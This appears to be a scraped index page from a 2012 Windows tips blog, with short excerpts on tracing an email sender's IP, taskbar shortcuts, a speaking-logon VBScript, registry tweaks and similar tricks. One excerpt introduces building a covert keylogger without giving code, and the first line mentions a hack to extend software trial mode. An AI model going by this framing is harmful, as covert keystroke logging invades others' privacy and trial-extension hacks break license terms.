Now to actually perform the hack that will extend the trial mode,

Monday 4 June 2012

How to trace E-mail sending Location

To track an email and its senders location details, you must know its internet IP address from which he sends the e-mail to you.
Here is the procedure on how you can track the email and its sender's locations by finding there Ips. Once we get the IP Address of the sender, it is very easy to track the sender location.














Finding the location is very useful in verifying the mails and the place they are sent. Since we receive the mails every day some of them may be verified for safety if they are regarding some offers or prizes.

Basically there are two basic steps involved in  this, one is finding the IP of the e-mail sender in the header section and then checking the location of that ip.

To find the IP address of an e-mail in the world's most popular Gmail:-

Tuesday 29 May 2012

How To Make Your Own Key Logger In Visual C++

Today I am going to teach "How To Make Your Own Key Logger ". If you know the C++ then you can easily understand the program.
Now a days key loggers are common to all the advance users it is a basic software but very useful software . But many people don't know that what is key logger.


Key Loggers are often called Keystroke logging is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored.

Here is the example of some of the key loggers:
1>refog
2>beyond
3>elite etc.
but I prefer the ardamax keylogger. 

Friday 25 May 2012

Make Your Computer Speak When you Log On


It’s a simple trick to amaze your friends.When you Log On infront of them.
Yeah a trick to make your Computer Welcome you on Start Up.


Lets Do It:

Open Notepad
Paste the bellow code in Np

Dim speaks, speech
speaks="Welcome Back, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks


Friday 11 May 2012

Create new instance of an Application in Windows 7 Super Taskbar

In windows 7 Taskbar instance of an application can easily be created by using Win + Number Key. Here number key signifies the position of the Application in the Taskbar


If you press Windows + 1, it will create a new instance of the first icon in the task bar. In the taskbar Shown here it will open an instance of Internet Explorer while Win+5 open Windows media Player, Win+7 to Windows Live writer and so on.
Now that‟s when i wish there must be Double digit Keys as well in Keyboard.

Friday 6 April 2012

HOW TO CHANGE ALBUM ART OF ANY SONG



Where does album art come from?

The Player downloads album art from an online database where the information is supplied by a variety of non-Microsoft data providers, such as AMG.

The Player downloads album art when you rip a CD. To do so, the Player attempts to match the CD to an entry in the online database. If it finds a match, the Player automatically downloads the media information that is available for the CD, including album art. In addition, the Player periodically scans your library for songs that are missing album art. If it can match a song that is missing album art to an entry in the online database, the Player will download the missing album art. However, if the correct album art is not downloaded automatically when you rip a CD, you can try to match an album in your library with album art in the online database, a file on your computer, or from a webpage.

Wednesday 4 April 2012

Copy Command Prompt Output


Windows 7 command prompt can be used with a clip utility that can used to copy the contents of the command prompt output into clipboard. It is very much similar like the way tee command works in UNIX. Tee command pipelines the output of a command in UNIX to another file. In Windows 7 we can use the „Clip‟ utility to copy the text of command prompt. Adding clip next to any command copy the output.

HOW TO BACKUP AND RESTORE MY INTERNETS FAVOURITES OR BOOKMARKS

Although there are several third-party software programs that will enable you to backup, restore, and manage your Internet browser bookmarks or favorites, all modern browsers today include bookmark managers and are capable of backing up and restoring your bookmarks or favorites. Below is a listing of each of the major browsers and how to backup and recover your Internet bookmarks or favorites.

Monday 2 April 2012

SUPER TASKBAR


In Windows 7, the taskbar has become a super Taskbar. All things are @ tips and fewer clicks are required for access to anything. Features of Windows 7 Taskbar

1. You can pin frequently used programs to the taskbar



Sunday 1 April 2012

KNOW YOUR WINDOWS AND PCs CONFIGURATION

If you want to know about your computer/laptop's exact configuration then you must know this.
by this one can easily understand his/her computer's configuration.

Step1:- Go to Run 

Step2:- Type 'dxdiag' press enter.

Saturday 31 March 2012

TWENTY WINDOWS 7 KEY SHORTCUTS


From Desktop


  •  Windows Key + Tab =  Aero [press Tab to cycle between Windows]
  •  Windows Key + E =  Windows Explorer is launched.
  •  Windows Key + R =  Run Command is launched.
  •  Windows Key + F =  Search (which is there in previous Windows versions too)
  •  Windows Key + X =  Mobility Center

Friday 30 March 2012

LOCK THE SCREEN SHORTCUTS


To Lock Screen in Windows 7 you have to press the Windows Key + L to lock it, now. The screen would be locked and password protected in case you have one.

In case you don‟t like shortkeys or you keep forgetting them, there‟s another option for screen lock.

HOW TO ACTIVATE GOD MODE IN WINDOWS 7(no software required)

God mode basically put every thing in one place i.e. folder and additional hidden secrets and shortcuts basically in one spot. So it is easy to find anything.


Thursday 29 March 2012


*

Wednesday 28 March 2012

Customize the Windows 7 log-on screen (no software required)

Windows 7 makes it easy changing the Windows log-on screen.



1. Go to start, and click on Run, type Regedit & press enter there.
2. Navigate to : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\ LogonUI\Background